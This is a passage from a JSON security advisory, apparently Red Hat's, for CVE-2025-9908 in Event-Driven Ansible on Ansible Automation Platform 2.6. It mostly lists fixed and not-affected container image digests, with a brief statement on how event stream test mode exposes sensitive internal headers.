"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "event-driven-ansible: Event Stream Test Mode Exposes Sensitive Headers in AAP EDA"
},
{
"acknowledgments": [
{
"names": [
"Elijah DeLee"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2025-9908",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2025-09-03T07:47:46.731000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2392835"
}
],
"notes": [
{
"category": "description",
"text": "No description is available for this CVE.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "event-driven-ansible: Sensitive Internal Headers Disclosure in AAP EDA Event Streams",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is classified as Moderate because the exposure of sensitive internal headers, including X-Trusted-Proxy and X-Envoy-* values, can lead to privilege escalation, request spoofing, and unauthorized access to internal infrastructure details. Exploitation requires low-complexity conditions and local access\u2014any user with an EDA credential or shared access to a job template and event stream can capture these headers once an event is sent. The persistence of captured headers further increases risk, as sensitive values remain accessible to the attacker until explicitly cleared.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
